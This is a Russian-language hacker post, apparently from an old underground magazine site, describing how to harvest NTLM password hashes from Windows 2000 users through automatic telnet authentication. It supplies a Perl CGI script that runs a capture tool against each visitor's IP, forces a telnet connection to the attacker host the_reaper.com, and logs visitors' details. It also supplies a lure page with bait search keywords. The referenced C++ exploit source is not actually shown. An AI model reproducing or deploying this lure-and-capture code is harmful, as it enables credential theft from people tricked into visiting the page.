• Партнер

  • Привет переЦ))

    Новая дырка в WIN2000 может
    дать тебе все, что ты хочешь))

    Суть: telnet автоматически
    проводит NTLM-авторизацию, если сервер ее
    поддерживает, без подтверждения
    пользователя. Это позволяет получить NTLM-хэш
    используя, например, URL telnet:

    Что болеет:
    MICROSOFT: Windows 2000 Professional
    MICROSOFT: Windows 2000 Server
    MICROSOFT: Windows 2000 Advanced Server
    ЙОУ вперед и с песней.!.!.!

    Для начала нужно
    спровоцировать клиента на telnet коннект, а
    затем шарахнуть по нему от всей X_души. Все
    нижеуказанное было испытано из под Linux RH6.1.
    Забиваем в JOE следующий текст
    (это сердце нашей машины смерти) сохранимся
    aka telnet2000.cpp и скомпилимся))).

    Далее нам нужно
    спровоцировать ЮЗВЕРЯ...

    Провокация проста до безобразия,
    размещаем сию форму у себя на серваке
    the_reaper.com в теле перлового скрипта from_me.cgi:

    #coded by -=Sky12DooR=-#
    #! usr/bin/perl
    use CGI qw(:standard);
    use Time::localtime;
    print header;
    $browser = "$ENV{HTTP_USER_AGENT}";
    $language = "$ENV{HTTP_ACCEPT_LANGUAGE}";
    $ip = "$ENV{REMOTE_ADDR}";
    `./telnetwin2000 -t $ip -l <logfile_name>`;
    print ("<html>");
    print ("<frameset rows='100%,*'>");
    print ("<frame src=about:blank>");
    print ("<frame src=telnet://the_reaper.com:23>");
    print ("</frameset></html>");
    $file="stupid_lamerzzz.txt";
    $St=ctime();
     open(writeip,">>$file");
    print writeip "$ip; $browser; $language ; $St\n";
    close(writeip);
    `killall telnetwin2000`;

    Далее создадим страничку cool_xakep.htm
    идексированную для запроса с поисковиков
    типа : очень клевые девочки, все для хакера .ГЫ...
    <html>
    <head><title>UR FAVORITE PAGE NOW</title>
    <meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
    <META HTTP-EQUIV="Pragma" CONTENT="no-cache">
    <meta name="Keywords" content="очень клевые
    девочки все для хакера etc...">
    <meta name="ROBOTS" content="INDEX,FOLLOW">
    </head>
    <FRAMESET ROWS="100%,*" BORDER="0" FRAMEBORDER="0"
    FRAMESPACING="0">
    <FRAME NAME="MYTOPFRAME" SRC="http://the_reaper.com/cgi-bin/from_me.cgi"
    MARGINHEIGHT="1" MARGINWIDTH="1" SCROLLING="AUTO"
    FRAMEBORDER="0" NORESIZE>
    <NOFRAMES>
      <body >
      <p>UR OS&BROWSER SO OLD I CANT TO FUCK U!!!.</p>
      </body>
      </noframes>
    </frameset>
    </html>

    ТЕПЕРЬ ОНИ ВСЕ ТВОИ! После захода на
    http://the_reaper.com/cool_xakep.htm порадутся инфе, которая
    находится в logfile_name. Список придурков
    которых ты поимел в файле - stupid_lamerzzz.txt

    THATS ALL FOLKS.

    P.S. Перец, над кое-чем тебе придется
    поразмыслить (это нужно в первую очередь тебе) , мне не пиши т.к. я далеко не
    альтруист.

    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии